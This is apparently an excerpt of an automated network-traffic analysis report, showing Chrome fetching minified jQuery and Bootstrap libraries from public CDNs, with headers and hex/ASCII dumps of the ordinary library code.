                                                                                2023-10-12 15:42:16 UTC880INData Raw: 2c 69 29 2c 6f 3d 22 6e 75 6d 62 65 72 22 29 2c 6e 75 6c 6c 21 3d 6e 26 26 6e 3d 3d 3d 6e 26 26 28 22 6e 75 6d 62 65 72 22 3d 3d 3d 6f 26 26 28 6e 2b 3d 69 26 26 69 5b 33 5d 7c 7c 28 77 2e 63 73 73 4e 75 6d 62 65 72 5b 73 5d 3f 22 22 3a 22 70 78 22 29 29 2c 68 2e 63 6c 65 61 72 43 6c 6f 6e 65 53 74 79 6c 65 7c 7c 22 22 21 3d 3d 6e 7c 7c 30 21 3d 3d 74 2e 69 6e 64 65 78 4f 66 28 22 62 61 63 6b 67 72 6f 75 6e 64 22 29 7c 7c 28 6c 5b 74 5d 3d 22 69 6e 68 65 72 69 74 22 29 2c 61 26 26 22 73 65 74 22 69 6e 20 61 26 26 76 6f 69 64 20 30 3d 3d 3d 28 6e 3d 61 2e 73 65 74 28 65 2c 6e 2c 72 29 29 7c 7c 28 75 3f 6c 2e 73 65 74 50 72 6f 70 65 72 74 79 28 74 2c 6e 29 3a 6c 5b 74 5d 3d 6e 29 29 7d 7d 2c 63 73 73 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b
                                                                                Data Ascii: ,i),o="number"),null!=n&&n===n&&("number"===o&&(n+=i&&i[3]||(w.cssNumber[s]?"":"px")),h.clearCloneStyle||""!==n||0!==t.indexOf("background")||(l[t]="inherit"),a&&"set"in a&&void 0===(n=a.set(e,n,r))||(u?l.setProperty(t,n):l[t]=n))}},css:function(e,t,n,r){
                                                                                2023-10-12 15:42:16 UTC885INData Raw: 6c 69 74 28 22 20 22 29 3a 5b 6e 5d 3b 72 3c 34 3b 72 2b 2b 29 69 5b 65 2b 6f 65 5b 72 5d 2b 74 5d 3d 6f 5b 72 5d 7c 7c 6f 5b 72 2d 32 5d 7c 7c 6f 5b 30 5d 3b 72 65 74 75 72 6e 20 69 7d 7d 2c 22 6d 61 72 67 69 6e 22 21 3d 3d 65 26 26 28 77 2e 63 73 73 48 6f 6f 6b 73 5b 65 2b 74 5d 2e 73 65 74 3d 4b 65 29 7d 29 2c 77 2e 66 6e 2e 65 78 74 65 6e 64 28 7b 63 73 73 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 7a 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 7b 7d 2c 61 3d 30 3b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 29 29 7b 66 6f 72 28 72 3d 24 65 28 65 29 2c 69 3d 74 2e 6c 65 6e 67 74 68 3b 61 3c 69 3b 61 2b 2b 29 6f 5b 74 5b 61 5d 5d 3d 77 2e 63 73 73 28 65 2c 74 5b 61 5d
                                                                                Data Ascii: lit(" "):[n];r<4;r++)i[e+oe[r]+t]=o[r]||o[r-2]||o[0];return i}},"margin"!==e&&(w.cssHooks[e+t].set=Ke)}),w.fn.extend({css:function(e,t){return z(this,function(e,t,n){var r,i,o={},a=0;if(Array.isArray(t)){for(r=$e(e),i=t.length;a<i;a++)o[t[a]]=w.css(e,t[a]
                                                                                2023-10-12 15:42:16 UTC887INData Raw: 7c 6e 75 6c 6c 3d 3d 65 2e 65 6c 65 6d 2e 73 74 79 6c 65 5b 77 2e 63 73 73 50 72 6f 70 73 5b 65 2e 70 72 6f 70 5d 5d 26 26 21 77 2e 63 73 73 48 6f 6f 6b 73 5b 65 2e 70 72 6f 70 5d 3f 65 2e 65 6c 65 6d 5b 65 2e 70 72 6f 70 5d 3d 65 2e 6e 6f 77 3a 77 2e 73 74 79 6c 65 28 65 2e 65 6c 65 6d 2c 65 2e 70 72 6f 70 2c 65 2e 6e 6f 77 2b 65 2e 75 6e 69 74 29 7d 7d 7d 2c 74 74 2e 70 72 6f 70 48 6f 6f 6b 73 2e 73 63 72 6f 6c 6c 54 6f 70 3d 74 74 2e 70 72 6f 70 48 6f 6f 6b 73 2e 73 63 72 6f 6c 6c 4c 65 66 74 3d 7b 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 65 6c 65 6d 2e 6e 6f 64 65 54 79 70 65 26 26 65 2e 65 6c 65 6d 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 28 65 2e 65 6c 65 6d 5b 65 2e 70 72 6f 70 5d 3d 65 2e 6e 6f 77 29 7d 7d 2c 77 2e 65 61 73 69 6e 67 3d
                                                                                Data Ascii: |null==e.elem.style[w.cssProps[e.prop]]&&!w.cssHooks[e.prop]?e.elem[e.prop]=e.now:w.style(e.elem,e.prop,e.now+e.unit)}}},tt.propHooks.scrollTop=tt.propHooks.scrollLeft={set:function(e){e.elem.nodeType&&e.elem.parentNode&&(e.elem[e.prop]=e.now)}},w.easing=
                                                                                2023-10-12 15:42:16 UTC888INData Raw: 21 79 7c 7c 76 6f 69 64 20 30 3d 3d 3d 79 5b 72 5d 29 63 6f 6e 74 69 6e 75 65 3b 67 3d 21 30 7d 64 5b 72 5d 3d 79 26 26 79 5b 72 5d 7c 7c 77 2e 73 74 79 6c 65 28 65 2c 72 29 7d 69 66 28 28 75 3d 21 77 2e 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 28 74 29 29 7c 7c 21 77 2e 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 28 64 29 29 7b 66 26 26 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 26 26 28 6e 2e 6f 76 65 72 66 6c 6f 77 3d 5b 68 2e 6f 76 65 72 66 6c 6f 77 2c 68 2e 6f 76 65 72 66 6c 6f 77 58 2c 68 2e 6f 76 65 72 66 6c 6f 77 59 5d 2c 6e 75 6c 6c 3d 3d 28 6c 3d 79 26 26 79 2e 64 69 73 70 6c 61 79 29 26 26 28 6c 3d 4a 2e 67 65 74 28 65 2c 22 64 69 73 70 6c 61 79 22 29 29 2c 22 6e 6f 6e 65 22 3d 3d 3d 28 63 3d 77 2e 63 73 73 28 65 2c 22 64 69 73 70 6c 61 79 22 29 29 26
                                                                                Data Ascii: !y||void 0===y[r])continue;g=!0}d[r]=y&&y[r]||w.style(e,r)}if((u=!w.isEmptyObject(t))||!w.isEmptyObject(d)){f&&1===e.nodeType&&(n.overflow=[h.overflow,h.overflowX,h.overflowY],null==(l=y&&y.display)&&(l=J.get(e,"display")),"none"===(c=w.css(e,"display"))&
                                                                                2023-10-12 15:42:16 UTC889INData Raw: 74 68 3b 6f 3c 61 3b 6f 2b 2b 29 6c 2e 74 77 65 65 6e 73 5b 6f 5d 2e 72 75 6e 28 72 29 3b 72 65 74 75 72 6e 20 73 2e 6e 6f 74 69 66 79 57 69 74 68 28 65 2c 5b 6c 2c 72 2c 6e 5d 29 2c 72 3c 31 26 26 61 3f 6e 3a 28 61 7c 7c 73 2e 6e 6f 74 69 66 79 57 69 74 68 28 65 2c 5b 6c 2c 31 2c 30 5d 29 2c 73 2e 72 65 73 6f 6c 76 65 57 69 74 68 28 65 2c 5b 6c 5d 29 2c 21 31 29 7d 2c 6c 3d 73 2e 70 72 6f 6d 69 73 65 28 7b 65 6c 65 6d 3a 65 2c 70 72 6f 70 73 3a 77 2e 65 78 74 65 6e 64 28 7b 7d 2c 74 29 2c 6f 70 74 73 3a 77 2e 65 78 74 65 6e 64 28 21 30 2c 7b 73 70 65 63 69 61 6c 45 61 73 69 6e 67 3a 7b 7d 2c 65 61 73 69 6e 67 3a 77 2e 65 61 73 69 6e 67 2e 5f 64 65 66 61 75 6c 74 7d 2c 6e 29 2c 6f 72 69 67 69 6e 61 6c 50 72 6f 70 65 72 74 69 65 73 3a 74 2c 6f 72 69 67 69
                                                                                Data Ascii: th;o<a;o++)l.tweens[o].run(r);return s.notifyWith(e,[l,r,n]),r<1&&a?n:(a||s.notifyWith(e,[l,1,0]),s.resolveWith(e,[l]),!1)},l=s.promise({elem:e,props:w.extend({},t),opts:w.extend(!0,{specialEasing:{},easing:w.easing._default},n),originalProperties:t,origi
                                                                                2023-10-12 15:42:16 UTC891INData Raw: 29 7d 7d 29 2c 77 2e 73 70 65 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 3f 77 2e 65 78 74 65 6e 64 28 7b 7d 2c 65 29 3a 7b 63 6f 6d 70 6c 65 74 65 3a 6e 7c 7c 21 6e 26 26 74 7c 7c 67 28 65 29 26 26 65 2c 64 75 72 61 74 69 6f 6e 3a 65 2c 65 61 73 69 6e 67 3a 6e 26 26 74 7c 7c 74 26 26 21 67 28 74 29 26 26 74 7d 3b 72 65 74 75 72 6e 20 77 2e 66 78 2e 6f 66 66 3f 72 2e 64 75 72 61 74 69 6f 6e 3d 30 3a 22 6e 75 6d 62 65 72 22 21 3d 74 79 70 65 6f 66 20 72 2e 64 75 72 61 74 69 6f 6e 26 26 28 72 2e 64 75 72 61 74 69 6f 6e 20 69 6e 20 77 2e 66 78 2e 73 70 65 65 64 73 3f 72 2e 64 75 72 61 74 69 6f 6e 3d 77 2e 66 78 2e 73 70 65 65 64 73 5b 72 2e 64 75 72 61 74 69 6f 6e
                                                                                Data Ascii: )}}),w.speed=function(e,t,n){var r=e&&"object"==typeof e?w.extend({},e):{complete:n||!n&&t||g(e)&&e,duration:e,easing:n&&t||t&&!g(t)&&t};return w.fx.off?r.duration=0:"number"!=typeof r.duration&&(r.duration in w.fx.speeds?r.duration=w.fx.speeds[r.duration
                                                                                2023-10-12 15:42:16 UTC912INData Raw: 3a 30 3b 66 6f 72 28 6e 2e 66 69 6e 69 73 68 3d 21 30 2c 77 2e 71 75 65 75 65 28 74 68 69 73 2c 65 2c 5b 5d 29 2c 69 26 26 69 2e 73 74 6f 70 26 26 69 2e 73 74 6f 70 2e 63 61 6c 6c 28 74 68 69 73 2c 21 30 29 2c 74 3d 6f 2e 6c 65 6e 67 74 68 3b 74 2d 2d 3b 29 6f 5b 74 5d 2e 65 6c 65 6d 3d 3d 3d 74 68 69 73 26 26 6f 5b 74 5d 2e 71 75 65 75 65 3d 3d 3d 65 26 26 28 6f 5b 74 5d 2e 61 6e 69 6d 2e 73 74 6f 70 28 21 30 29 2c 6f 2e 73 70 6c 69 63 65 28 74 2c 31 29 29 3b 66 6f 72 28 74 3d 30 3b 74 3c 61 3b 74 2b 2b 29 72 5b 74 5d 26 26 72 5b 74 5d 2e 66 69 6e 69 73 68 26 26 72 5b 74 5d 2e 66 69 6e 69 73 68 2e 63 61 6c 6c 28 74 68 69 73 29 3b 64 65 6c 65 74 65 20 6e 2e 66 69 6e 69 73 68 7d 29 7d 7d 29 2c 77 2e 65 61 63 68 28 5b 22 74 6f 67 67 6c 65 22 2c 22 73 68 6f
                                                                                Data Ascii: :0;for(n.finish=!0,w.queue(this,e,[]),i&&i.stop&&i.stop.call(this,!0),t=o.length;t--;)o[t].elem===this&&o[t].queue===e&&(o[t].anim.stop(!0),o.splice(t,1));for(t=0;t<a;t++)r[t]&&r[t].finish&&r[t].finish.call(this);delete n.finish})}}),w.each(["toggle","sho
                                                                                2023-10-12 15:42:16 UTC928INData Raw: 65 78 74 65 6e 64 28 7b 77 72 61 70 41 6c 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 72 65 74 75 72 6e 20 74 68 69 73 5b 30 5d 26 26 28 67 28 65 29 26 26 28 65 3d 65 2e 63 61 6c 6c 28 74 68 69 73 5b 30 5d 29 29 2c 74 3d 77 28 65 2c 74 68 69 73 5b 30 5d 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 29 2e 65 71 28 30 29 2e 63 6c 6f 6e 65 28 21 30 29 2c 74 68 69 73 5b 30 5d 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 74 68 69 73 5b 30 5d 29 2c 74 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 77 68 69 6c 65 28 65 2e 66 69 72 73 74 45 6c 65 6d 65 6e 74 43 68 69 6c 64 29 65 3d 65 2e 66 69 72 73 74 45 6c 65 6d 65 6e 74 43 68 69 6c 64 3b 72 65 74 75 72 6e 20 65 7d 29 2e 61 70
                                                                                Data Ascii: extend({wrapAll:function(e){var t;return this[0]&&(g(e)&&(e=e.call(this[0])),t=w(e,this[0].ownerDocument).eq(0).clone(!0),this[0].parentNode&&t.insertBefore(this[0]),t.map(function(){var e=this;while(e.firstElementChild)e=e.firstElementChild;return e}).ap


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                17151.101.2.137443192.168.2.449756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:16 UTC720INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Content-Length: 69597
                                                                                Server: nginx
                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                ETag: "28feccc0-10fdd"
                                                                                Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                Access-Control-Allow-Origin: *
                                                                                Via: 1.1 varnish, 1.1 varnish
                                                                                Accept-Ranges: bytes
                                                                                Date: Thu, 12 Oct 2023 15:42:16 GMT
                                                                                Age: 2221535
                                                                                X-Served-By: cache-lga21963-LGA, cache-bur-kbur8200152-BUR
                                                                                X-Cache: HIT, HIT
                                                                                X-Cache-Hits: 737, 1
                                                                                X-Timer: S1697125336.193789,VS0,VE1
                                                                                Vary: Accept-Encoding
                                                                                2023-10-12 15:42:16 UTC749INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 32 2e 31 20 2d 61 6a 61 78 2c 2d 61 6a 61 78 2f 6a 73 6f 6e 70 2c 2d 61 6a 61 78 2f 6c 6f 61 64 2c 2d 61 6a 61 78 2f 70 61 72 73 65 58 4d 4c 2c 2d 61 6a 61 78 2f 73 63 72 69 70 74 2c 2d 61 6a 61 78 2f 76 61 72 2f 6c 6f 63 61 74 69 6f 6e 2c 2d 61 6a 61 78 2f 76 61 72 2f 6e 6f 6e 63 65 2c 2d 61 6a 61 78 2f 76 61 72 2f 72 71 75 65 72 79 2c 2d 61 6a 61 78 2f 78 68 72 2c 2d 6d 61 6e 69 70 75 6c 61 74 69 6f 6e 2f 5f 65 76 61 6c 55 72 6c 2c 2d 65 76 65 6e 74 2f 61 6a 61 78 2c 2d 65 66 66 65 63 74 73 2c 2d 65 66 66 65 63 74 73 2f 54 77 65 65 6e 2c 2d 65 66 66 65 63 74 73 2f 61 6e 69 6d 61 74 65 64 53 65 6c 65 63 74 6f 72 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e
                                                                                Data Ascii: /*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other con
                                                                                2023-10-12 15:42:16 UTC796INData Raw: 7c 5b 5d 2c 6e 3d 6a 5b 30 5d 3d 3d 3d 77 26 26 6a 5b 31 5d 2c 74 3d 6e 26 26 6a 5b 32 5d 2c 6d 3d 6e 26 26 71 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 6e 5d 3b 77 68 69 6c 65 28 6d 3d 2b 2b 6e 26 26 6d 26 26 6d 5b 70 5d 7c 7c 28 74 3d 6e 3d 30 29 7c 7c 6f 2e 70 6f 70 28 29 29 69 66 28 31 3d 3d 3d 6d 2e 6e 6f 64 65 54 79 70 65 26 26 2b 2b 74 26 26 6d 3d 3d 3d 62 29 7b 6b 5b 61 5d 3d 5b 77 2c 6e 2c 74 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 73 26 26 28 6d 3d 62 2c 6c 3d 6d 5b 75 5d 7c 7c 28 6d 5b 75 5d 3d 7b 7d 29 2c 6b 3d 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 2c 6a 3d 6b 5b 61 5d 7c 7c 5b 5d 2c 6e 3d 6a 5b 30 5d 3d 3d 3d 77 26 26 6a 5b 31 5d 2c 74 3d 6e 29 2c 74 3d 3d 3d 21 31 29 77 68 69
                                                                                Data Ascii: |[],n=j[0]===w&&j[1],t=n&&j[2],m=n&&q.childNodes[n];while(m=++n&&m&&m[p]||(t=n=0)||o.pop())if(1===m.nodeType&&++t&&m===b){k[a]=[w,n,t];break}}else if(s&&(m=b,l=m[u]||(m[u]={}),k=l[m.uniqueID]||(l[m.uniqueID]={}),j=k[a]||[],n=j[0]===w&&j[1],t=n),t===!1)whi
                                                                                2023-10-12 15:42:16 UTC848INData Raw: 65 2c 66 2c 67 29 7b 76 61 72 20 68 3d 30 2c 69 3d 61 2e 6c 65 6e 67 74 68 2c 6a 3d 6e 75 6c 6c 3d 3d 63 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 3d 72 2e 74 79 70 65 28 63 29 29 7b 65 3d 21 30 3b 66 6f 72 28 68 20 69 6e 20 63 29 54 28 61 2c 62 2c 68 2c 63 5b 68 5d 2c 21 30 2c 66 2c 67 29 7d 65 6c 73 65 20 69 66 28 76 6f 69 64 20 30 21 3d 3d 64 26 26 28 65 3d 21 30 2c 72 2e 69 73 46 75 6e 63 74 69 6f 6e 28 64 29 7c 7c 28 67 3d 21 30 29 2c 6a 26 26 28 67 3f 28 62 2e 63 61 6c 6c 28 61 2c 64 29 2c 62 3d 6e 75 6c 6c 29 3a 28 6a 3d 62 2c 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 6a 2e 63 61 6c 6c 28 72 28 61 29 2c 63 29 7d 29 29 2c 62 29 29 66 6f 72 28 3b 68 3c 69 3b 68 2b 2b 29 62 28 61 5b 68 5d 2c 63 2c 67 3f 64 3a 64 2e 63
                                                                                Data Ascii: e,f,g){var h=0,i=a.length,j=null==c;if("object"===r.type(c)){e=!0;for(h in c)T(a,b,h,c[h],!0,f,g)}else if(void 0!==d&&(e=!0,r.isFunction(d)||(g=!0),j&&(g?(b.call(a,d),b=null):(j=b,b=function(a,b,c){return j.call(r(a),c)})),b))for(;h<i;h++)b(a[h],c,g?d:d.c
                                                                                2023-10-12 15:42:16 UTC892INData Raw: 6f 5d 29 7b 69 66 28 62 2e 65 76 65 6e 74 73 29 66 6f 72 28 64 20 69 6e 20 62 2e 65 76 65 6e 74 73 29 65 5b 64 5d 3f 72 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 63 2c 64 29 3a 72 2e 72 65 6d 6f 76 65 45 76 65 6e 74 28 63 2c 64 2c 62 2e 68 61 6e 64 6c 65 29 3b 63 5b 57 2e 65 78 70 61 6e 64 6f 5d 3d 76 6f 69 64 20 30 7d 63 5b 58 2e 65 78 70 61 6e 64 6f 5d 26 26 28 63 5b 58 2e 65 78 70 61 6e 64 6f 5d 3d 76 6f 69 64 20 30 29 7d 7d 7d 29 2c 72 2e 66 6e 2e 65 78 74 65 6e 64 28 7b 64 65 74 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 4b 61 28 74 68 69 73 2c 61 2c 21 30 29 7d 2c 72 65 6d 6f 76 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 4b 61 28 74 68 69 73 2c 61 29 7d 2c 74 65 78 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29
                                                                                Data Ascii: o]){if(b.events)for(d in b.events)e[d]?r.event.remove(c,d):r.removeEvent(c,d,b.handle);c[W.expando]=void 0}c[X.expando]&&(c[X.expando]=void 0)}}}),r.fn.extend({detach:function(a){return Ka(this,a,!0)},remove:function(a){return Ka(this,a)},text:function(a)
                                                                                2023-10-12 15:42:16 UTC908INData Raw: 46 75 6e 63 74 69 6f 6e 28 61 29 3f 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 28 74 68 69 73 29 2e 77 72 61 70 49 6e 6e 65 72 28 61 2e 63 61 6c 6c 28 74 68 69 73 2c 62 29 29 7d 29 3a 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3d 72 28 74 68 69 73 29 2c 63 3d 62 2e 63 6f 6e 74 65 6e 74 73 28 29 3b 63 2e 6c 65 6e 67 74 68 3f 63 2e 77 72 61 70 41 6c 6c 28 61 29 3a 62 2e 61 70 70 65 6e 64 28 61 29 7d 29 7d 2c 77 72 61 70 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 72 2e 69 73 46 75 6e 63 74 69 6f 6e 28 61 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 28 74 68 69 73 29 2e 77 72 61 70 41 6c 6c 28 62 3f 61 2e 63 61 6c 6c 28 74 68 69 73 2c
                                                                                Data Ascii: Function(a)?this.each(function(b){r(this).wrapInner(a.call(this,b))}):this.each(function(){var b=r(this),c=b.contents();c.length?c.wrapAll(a):b.append(a)})},wrap:function(a){var b=r.isFunction(a);return this.each(function(c){r(this).wrapAll(b?a.call(this,


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                18192.168.2.449759104.18.11.207443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:16 UTC813OUTGET /bootstrap/3.3.7/js/bootstrap.min.js HTTP/1.1
                                                                                Host: maxcdn.bootstrapcdn.com
                                                                                Connection: keep-alive
                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                Origin: https://fleek.ipfs.io
                                                                                sec-ch-ua-mobile: ?0
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                sec-ch-ua-platform: "Windows"
                                                                                Accept: */*
                                                                                Sec-Fetch-Site: cross-site
                                                                                Sec-Fetch-Mode: cors
                                                                                Sec-Fetch-Dest: script
                                                                                Referer: https://fleek.ipfs.io/
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                19192.168.2.449758104.18.11.207443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:16 UTC814OUTGET /bootstrap/4.1.0/js/bootstrap.min.js HTTP/1.1
                                                                                Host: stackpath.bootstrapcdn.com
                                                                                Connection: keep-alive
                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                Origin: https://fleek.ipfs.io
                                                                                sec-ch-ua-mobile: ?0
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                sec-ch-ua-platform: "Windows"
                                                                                Accept: */*
                                                                                Sec-Fetch-Site: cross-site
                                                                                Sec-Fetch-Mode: cors
                                                                                Sec-Fetch-Dest: script
                                                                                Referer: https://fleek.ipfs.io/
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                2192.168.2.449747172.217.14.78443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:10 UTC1OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                                                                                Host: clients2.google.com
                                                                                Connection: keep-alive
                                                                                X-Goog-Update-Interactivity: fg
                                                                                X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                                                                                X-Goog-Update-Updater: chromecrx-117.0.5938.132
                                                                                Sec-Fetch-Site: none
                                                                                Sec-Fetch-Mode: no-cors
                                                                                Sec-Fetch-Dest: empty
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                20104.18.11.207443192.168.2.449759C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:16 UTC936INHTTP/1.1 200 OK
                                                                                Date: Thu, 12 Oct 2023 15:42:16 GMT
                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                CDN-PullZone: 252412
                                                                                CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                CDN-RequestCountryCode: US
                                                                                Access-Control-Allow-Origin: *
                                                                                Cache-Control: public, max-age=31919000
                                                                                ETag: W/"5869c96cc8f19086aee625d670d741f9"
                                                                                Last-Modified: Mon, 25 Jan 2021 22:04:00 GMT
                                                                                CDN-CachedAt: 08/29/2023 17:26:00
                                                                                CDN-ProxyVer: 1.04
                                                                                CDN-RequestPullCode: 200
                                                                                CDN-RequestPullSuccess: True
                                                                                CDN-EdgeStorageId: 899
                                                                                timing-allow-origin: *
                                                                                cross-origin-resource-policy: cross-origin
                                                                                X-Content-Type-Options: nosniff
                                                                                CDN-Status: 200
                                                                                CDN-RequestId: 342685e15251ab1e69372b7f86d5239e
                                                                                CDN-Cache: HIT
                                                                                CF-Cache-Status: HIT
                                                                                Age: 197361
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Server: cloudflare
                                                                                CF-RAY: 815073a928cc2b5b-LAX
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                2023-10-12 15:42:16 UTC937INData Raw: 37 63 31 36 0d 0a 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 33 2e 33 2e 37 20 28 68 74 74 70 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 36 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 42 6f 6f 74 73 74 72 61 70 27 73 20 4a 61 76 61 53 63 72 69 70 74 20 72 65 71 75 69 72 65 73 20 6a 51 75 65 72 79 22 29 3b 2b 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 62 3d 61 2e 66 6e
                                                                                Data Ascii: 7c16/*! * Bootstrap v3.3.7 (http://getbootstrap.com) * Copyright 2011-2016 Twitter, Inc. * Licensed under the MIT license */if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){"use strict";var b=a.fn
                                                                                2023-10-12 15:42:16 UTC938INData Raw: 20 6c 6f 77 65 72 20 74 68 61 6e 20 76 65 72 73 69 6f 6e 20 34 22 29 7d 28 6a 51 75 65 72 79 29 2c 2b 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 62 28 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 62 6f 6f 74 73 74 72 61 70 22 29 2c 62 3d 7b 57 65 62 6b 69 74 54 72 61 6e 73 69 74 69 6f 6e 3a 22 77 65 62 6b 69 74 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 4d 6f 7a 54 72 61 6e 73 69 74 69 6f 6e 3a 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 2c 4f 54 72 61 6e 73 69 74 69 6f 6e 3a 22 6f 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 20 6f 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 2c 74 72 61 6e 73 69 74 69 6f 6e 3a 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64
                                                                                Data Ascii: lower than version 4")}(jQuery),+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend
